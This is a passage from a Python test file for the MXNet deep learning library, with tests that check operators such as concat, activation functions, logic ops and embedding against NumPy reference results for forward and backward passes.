ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_device(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_device(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_device(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_device(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_log_sigmoid():
def flog_sigmoid(a):
return np.log(np.divide(1.0, np.add(1.0, np.exp(-a))))
def flog_sigmoid_grad(a):
return np.divide(1.0, np.add(1.0, np.exp(a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.log_sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = flog_sigmoid(xa)
ya_grad = flog_sigmoid_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_mish():
def fmish(a):
return a * np.tanh(np.log1p(np.exp(a)))
def fmish_grad(a):
softrelu = np.log1p(np.exp(a))
tanh = np.tanh(softrelu)
sigmoid = np.divide(1.0, (1.0 + np.exp(-a)))
return tanh + a * sigmoid * (1.0 - tanh * tanh)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.mish(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fmish(xa)
ya_grad = fmish_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_device(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_device(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_device(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_device(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_device(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_device(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_device(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_device(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_device(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_device(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
